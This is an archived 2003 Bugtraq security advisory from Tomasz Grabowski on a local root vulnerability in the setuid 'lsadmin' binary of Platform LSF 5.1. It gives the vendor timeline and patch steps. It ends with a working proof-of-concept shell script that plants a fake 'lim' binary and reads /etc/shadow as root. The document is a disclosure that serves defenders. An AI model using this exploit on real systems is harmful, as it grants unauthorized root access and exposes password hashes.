[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.44.0305221500440.1821-100000@rubycon.man.szczecin.pl>
Date: Thu, 22 May 2003 15:31:22 +0200 (CEST)
From: Tomasz Grabowski <cadence@...llo.aci.com.pl>
To: bugtraq@...urityfocus.com
Subject: Security advisory: LSF 5.1 local root exploit
Security Advisory
22 May 2003
Local root in LSF 5.1
Name: Load Sharing Facility version 5.1
Severity: High
Vendor URL: http://www.platform.com
Author: Tomasz Grabowski (cadence@....com.pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix: 19 Mar 2003
Commercial: I'm looking for a new job
Impact: An attacker can gain root priviledge by forcing the 'lsadmin'
binary to execute code of attackers choice. The 'lsadmin' binary
is setuid root.
Description:
The 'lsadmin' binary has a "ckconfig" command. It uses it to check the
correctness of config files. Right after it starts, it is using the
external 'lim' binary . It is using the LSF_SERVERDIR variable in lsf.conf
file to obtain a path for 'lim' binary. Regular user can make his own
lsf.conf file and, by using the LSF_ENVDIR variable, force 'lsadmin' to
use it instead of default /etc/lsf.conf file. Attacker can therefore point
the LSF_SERVERDIR variable to his own 'lim' binary. The attackers 'lim'
binary will be executed with setuid root priviledges.
How to patch:
1) Download the lsadmin patch from Platform ftp site
ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z
If you do not have username/password to access ftp.platform.com, contact
support@...tform.com
2) In the LSF_BINDIR, move old lsadmin to lsadmin.old.
Uncompress and rename downloaded binary to lsadmin.
Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.
For more information on patch or related questions, contact
support@...tform.com
Exploit:
# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ
# Proof of concept - for educational purposes only!
cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__
gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file
---
Tomasz Grabowski (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@....szczecin.pl
Powered by blists - more mailing lists